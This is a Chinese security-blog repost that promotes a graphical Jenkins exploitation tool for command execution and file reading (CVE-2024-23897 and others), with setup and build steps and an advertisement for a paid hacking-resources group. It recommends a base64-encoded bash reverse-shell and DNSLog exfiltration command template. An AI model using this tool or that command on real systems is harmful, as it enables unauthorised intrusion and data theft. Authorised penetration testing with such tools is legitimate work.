【工具】一款图形化Jenkins综合漏洞利用工具

admin
admin
admin
0
文章
0
评论
2026-03-03 09:40:22 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 本文介绍了一款名为JenkinsExploit-GUI的图形化Jenkins漏洞利用工具。该工具基于Java开发,支持一键检测命令执行、文件读取等高危漏洞,覆盖CVE-2024-23897等版本。文章详细阐述了环境配置、payload及DNSLog设置,并展示测试案例。该工具降低了测试门槛,适合安全人员进行漏洞排查,文末附带推广信息。 综合评分: 76 文章分类: 安全工具,渗透测试,漏洞POC,红队,WEB安全

cover_image

【工具】一款图形化Jenkins综合漏洞利用工具

原创

track track

泷羽Sec-track

2026年2月14日 22:03 安徽

声明!本文章所有的工具分享仅仅只是供大家学习交流为主,切勿用于非法用途,如有任何触犯法律的行为,均与本人及团队无关!!!

往期推荐:

【工具】自动化提取webpack打包前端接口

【工具】Spring-boot框架扫描工具

【工具】Heapdump图形化解密工具

【工具】VueCrack-一键检测Vue站点未授权漏洞

【工具】Burp自动化SSRF检测插件

公众号:

公众号后台回复260214即可获取工具

JenkinsExploit-GUI

一款Jenkins综合漏洞利用工具,名为 JenkinsExploit-GUI 的工具,采用图形化界面设计,将复杂的漏洞利用过程简化为一键式操作,极大降低了安全测试的技术门槛。它不仅支持对Jenkins多个历史版本中存在的高危漏洞进行检测,还提供了便捷的命令执行和文件读取功能,帮助用户快速评估目标系统的安全状况

使用配置

环境

jdk 8+

源地址:https://github.com/TheBeastofwar/JenkinsExploit-GUI

外置payload

从release下载windows_tools,linux_tools或macOS_tools并放在与JenkinsExploit-GUI-*-SNAPSHOT.jar相同的目录,或者可以自行打包tools_source中的python源码文件

如果是linux或macOS的话需要对外置payload进行chmod +x 赋予权限

image-20260214215437406

可用exe

image-20260214215449398

dnslog配置

进行dnslog设置,目前仅支持dnslog.pw和ceye.io

image-20260214215509445

配置

image-20260214215521341

漏洞检测

image-20260214215536356

  • 在验证无回显命令执行的时候为了避免转义问题,推荐用如下方式进行反弹shell和dnslog外带信息
bash -c {echo,Y....}|{base64,-d}|{bash,-i}

支持检测

目前支持以下

image-20260214215201549

测试案例

命令执行

image-20260214215708499

文件读取

image-20260214215723937

源码打包

使用如下命令

mvn clean package -DskipTests
cd target
zip -d  JenkinsExploit-GUI-*-SNAPSHOT.jar 'META-INF/*.SF' 'META-INF/*.RSA' 'META-INF/*DSA'

广告时间

感兴趣的师傅可以看看我们的内部知识星球,包含各种福利

  • 1000+份SRC报告(覆盖各主流SRC平台、通用格式、复现技巧)
  • 常用漏洞脚本 / 渗透工具合集
  • 网络安全电子书资料包
  • SRC报告 / 测试报告模板
  • 常见渗透面试题+思路答法
  • 若干方向的学习资料合集(CTF、免杀、AI安全、应急响应、渗透、内网、安卓逆向、开发语言、面试题等)
  • 社群问答 / 项目机会 / 职业建议

部分资源展示

9084ce2aaa2473e734e083b054dd91c9

e8a94d452242c4bb72618077b320bb60

84f58b438ec04c44da38901f08c96ab0

25b07856ed6e77f7e9f314542a8cb22f

帮会专注于分享网络安全领域的资料收集分享,包括且不限于:渗透测试报告、渗透工具、学习资料、漏洞挖掘、各种源码系统、破解工具、安全运维、代码审计、安卓逆向、CTF比赛技巧、红队攻防等等。

目前帮会已有1400+资源,已有680+会员,期待你加入我们~

6a3307cf0e4af074dd3374fb50b86a78

知识大陆扫描二维码即可

微信图片_20260214084541_41_38

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:泷羽Sec-track track track《【工具】一款图形化Jenkins综合漏洞利用工具》

版权声明

本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。

ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网 | 安全领域涉猎者-乌云独行地带
安全领域涉猎者-乌云独行地带
ZONE.CI 全球网
评论:0   参与:  0